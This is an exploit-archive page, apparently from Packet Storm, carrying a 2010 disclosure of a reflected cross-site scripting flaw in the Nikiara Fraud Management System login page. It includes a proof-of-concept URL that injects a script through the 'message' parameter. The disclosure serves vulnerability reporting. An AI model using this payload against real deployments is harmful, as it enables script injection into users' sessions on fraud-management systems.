exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Nikiara Fraud Management System Cross Site Scripting

Nikiara Fraud Management System Cross Site Scripting
Posted Feb 12, 2010
Authored by thebluegenius

The Nikiara Fraud Management System suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | a879d89dd457a400639f1f20988e549522696f05b6083abf4da8ac640fdfd2e5

Nikiara Fraud Management System Cross Site Scripting

Change Mirror Download
--------------------------------------------------------------------
# Exploit Title: Nikiara Fraud Management System XSS Vulnerability
# Date: 10 Feb 2010
# Author: thebluegenius
# Software Link: http://www.subexworld.com/fraud-management.html
# Version: All
# Tested on: Unix | Apache 2.2.4
# CVE : NA

---------------------------------------------------
"Nikara Fraud Management System" XSS vulnerability.
---------------------------------------------------
By :Thebluegenius.
Email :rajsm@isac.org.in
Blog :thebluegenius.com.
---------------------------------------------------

Description:

Nikira Fraud Management System is the next generation fraud management solution built to deliver on a 3-step philosophy of Detect-Investigate-Protect. Nikira detects known fraud types and patterns of unusual behaviour, helps investigate these unusual patterns for potential fraud, and uses the knowledge, thus generated, to upgrade and protect against future intrusions.

The vulnerability lies at client login page. Presently this product is deployed at over 90% of Telecom companies across the world.

------------------
Vulnerability: XSS
------------------

you can execute XSS as given below:

http://IPaddress:port/login/prompt?message=%3Cscript%3Ealert%28%27Reflected%20XSS%27%29%3C/script%3E

-----------------------------------------------------
Greetz Fly Out to:
1] Amforked() : My good friend
2] Aodrulez : for inspiring me
3] www.OrchidSeven.com
4] www.isac.org.in

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close